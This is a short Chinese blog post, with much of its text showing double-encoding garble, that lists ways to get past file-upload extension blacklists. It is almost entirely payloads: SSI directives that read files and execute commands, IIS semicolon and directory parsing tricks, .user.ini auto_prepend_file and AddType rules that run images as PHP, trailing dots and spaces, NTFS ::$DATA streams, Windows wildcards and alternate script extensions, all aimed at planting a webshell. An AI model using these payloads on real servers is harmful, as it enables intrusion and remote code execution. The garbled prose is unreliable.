您好,登錄后才能下訂單哦!
當(dāng)做代碼的審計(jì)或者文件搞滲文章上傳的時(shí)候有時(shí)候會(huì)遇到黑名單的驗(yàn)證碼,比如常規(guī)的一些腳本名asp php jsp這種的不允許上傳,下面是我總結(jié)的一些繞過(guò)的方法
<!--#includefile="/home/www/user8534/nav_foot.htm"--> //可以用來(lái)讀文件
<!--#exec cmd="ifconfig"--> //可以用來(lái)執(zhí)行命令
sanr.php;.gif
sanr.asp;.jpg
sanr.asp/sanr.jpg
User.ini
auto_prepend_file:指定在每個(gè)PHP頁(yè)面執(zhí)行前所要執(zhí)行的代碼
auto_prepend_file=demo.gif (每個(gè)頁(yè)面都會(huì)加載demo.gif)
AddTypeapplication/x-httpd-php .jpg
利用空格 demo.php空格
小數(shù)點(diǎn)去繞過(guò) demo.php.
Ads數(shù)據(jù)流 demo.php::$DATA
Ads數(shù)據(jù)流(但文件是空) demo.php:jpg
Window通配符 demo.<<< 兩者相結(jié)合拿到webshell
Tips:直接用3就可以 只不過(guò)延伸下window通配符的方法
Window通配符可以在包含文件的時(shí)候包含c:window/temp目錄臨時(shí)php文件(文件包含本地測(cè)試成功 但是實(shí)際***很少成功 因?yàn)閟ession文件也是php開頭 如同時(shí)匹配多個(gè)文件以php開頭的這種,會(huì)拿到第一個(gè)php文件,不確保是自己上傳的臨時(shí)文件)
aSp pHp JsP
Asp:asa cer cdx
Aspx: ashx asmx ascx
Php: php3 phtml
Jsp: jspx jspf
sanr.php.xxxxxx
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。